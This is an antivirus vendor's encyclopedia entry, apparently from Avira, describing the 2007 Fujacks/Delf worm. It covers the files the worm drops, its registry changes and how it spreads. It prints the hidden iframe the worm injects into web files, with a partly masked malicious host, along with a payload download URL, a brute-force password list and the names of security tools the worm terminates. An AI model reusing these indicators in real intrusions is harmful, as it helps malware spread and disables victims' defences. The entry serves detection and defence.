English
Deutsch
Francais
Español
Italian
Home
Virus Info
TR/Proxy.Delf.CA
Search
Home
Support
Solutions
Products
Downloads
Virus Info
Statistics
Phishing Worldmap
VDF History
Virus Science
Submit Sample
Security News
Viruses In the Wild
Company
Press
Partners
Newsletter
TR/Proxy.Delf.CA - Trojan
See also
Summary
Full description
Statistics
How would you rate this information?
Worthless
Excellent
Virus:
TR/Proxy.Delf.CA
Date discovered:
26/02/2007
Type:
Worm
In the wild:
Yes
Reported Infections:
Low
Distribution Potential:
Medium
Damage Potential:
Medium
Static file:
Yes
File size:
28.833 Bytes
MD5 checksum:
916ede7e54c83f11f0f99f7e53178a3b
IVDF version:
6.37.01.162
- Mon, 26 Feb 2007 09:41 (GMT+1)
General
Methods of propagation:
• Local network
• Mapped network drives
Aliases:
• Mcafee: W32/Fujacks
• Kaspersky: Worm.Win32.Delf.bd
• F-Secure: Worm.Win32.Delf.bd
• Sophos: W32/Fujacks-AU
• Grisoft: Worm/Delf.AEP
• Eset: Win32/Fujacks.O
• Bitdefender: Win32.Worm.Fujacks.J
Platforms / OS:
• Windows 95
• Windows 98
• Windows 98 SE
• Windows NT
• Windows ME
• Windows 2000
• Windows XP
• Windows 2003
Side effects:
• Disable security applications
• Downloads files
• Drops files
• Lowers security settings
• Registry modification
Files
It copies itself to the following locations:
•
%SYSDIR%
\drivers\spoclsv.exe
•
%drive%
\setup.exe
Sections are added to the following files.
– To:
%all directories%
\*.htm With the following contents:
• iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe
This renames a file after system reboot.
– To:
%all directories%
\*.html With the following contents:
• iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe
– To:
%all directories%
\*.asp With the following contents:
• iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe
– To:
%all directories%
\*.php With the following contents:
• iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe
– To:
%all directories%
\*.jsp With the following contents:
• iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe
– To:
%all directories%
\*.aspx With the following contents:
• iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe
The following files are created:
–
%all directories%
\Desktop_.ini This is a non malicious text file with the following content:
•
%current date%
–
%drive%
\autorun.inf This is a non malicious text file with the following content:
•
%code that runs malware%
It tries to download a file:
– The location is the following:
• http://www.baidu8.org/**********/xm.txt
This file may contain further download locations and might serve as source for new threats.
Registry
The following registry key is continuously in an infinite loop added in order to run the process after reboot.
– [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
•
%SYSDIR%
\drivers\spoclsv.exe
The values of the following registry key are removed:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
• RavTask
• KvMonXP
• kav
• KAVPersonal50
• McAfeeUpdaterUI
• Network Associates Error Reporting Service
• ShStatEXE
• YLive.exe
• yassistse
The following registry key is changed:
Various Explorer settings:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
Folder\Hidden\SHOWALL]
Old value:
• CheckedValue =
%user defined settings%
New value:
• CheckedValue = 0
Network Infection
In order to ensure its propagation the malware attemps to connect to other machines as described below.
It uses the following login information in order to gain access to the remote machine:
– The following list of usernames:
• Administrator
• Guest
• admin
• Root
– The following list of passwords:
• 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100
IP address generation:
It creates random IP addresses while it keeps the first three octets from its own address. Afterwards it tries to establish a connection with the created addresses.
Infection process:
The downloaded file is stored on the compromised machine as:
%all shared folders%
\GameSetup.exe
Slow down:
– It creates the following number of infection threads: 9
– Depending on your bandwidth you might notice a fall in your network speed. As the network activity for this malware is medium you might not take notice of this if you have a broadband connection.
– You might also note a slight slow down due to the multiple network threads created.
Process termination
List of processes that are terminated:
• Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe
Processes containing one of the following window titles are terminated:
• Symantec AntiVirus
• Duba
• Windows
• esteem procs
• System Safety Monitor
• Wrapped gift Killer
• Winsock Expert
List of services that are disabled:
• sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
Symantec Core LC; NPFMntor; MskService; FireSvc
File details
Programming language:
The malware program was written in Delphi.
Runtime packer:
In order to aggravate detection and reduce size of the file it is packed with the following runtime packer:
• FSG
See a brief description
here
.
Description inserted by Andrei Gherman on Thu, 19 Jun 2008 13:28 (GMT+1)
Description updated by Andrei Gherman on Thu, 19 Jun 2008 13:40 (GMT+1)
»
About Malware
»
About Phishing
»
Viruses In the Wild
« back
Print this page
Worm/Bagle.FJ
W32/Elkern.C
Worm/Mytob.DH
Worm/Mytob.CR
Worm/Netsky.D.Dam
TR/Dldr.Agent.aizj
JS/Dldr.Small.CR.2
TR/Dldr.Agent.XAE
JS/Dldr.Agent.bbt
HTML/IFrame.800
Get comfortable up to the minute info from Avira as
Detects and removes the following malware and its variants:
Worm/Sober.J
Worm/Sober.P
Worm/Sober.Y
W32/Stanit.A
Worm/NetSky.AA
Worm/NetSky.B.1
Worm/NetSky.C
Worm/Netsky.D.Dam
Worm/NetSky.P
Worm/NetSky.X
Worm/Mytob.IN.2
Worm/Mytob.KS
TR/Spy.Banker.AATZ
TR/Spy.Banker.AATZ.1
TR/Spy.Banker.AATZ.2
TR/Spy.Banker.AATZ.3
Download here
Click
here
to get the panel...
© 2008 Avira GmbH
Copyright
Privacy
Sitemap
Feedback
Imprint
FAQ
Contact
Virus Info TR/Proxy.Delf.CA
Print this page
.gif)
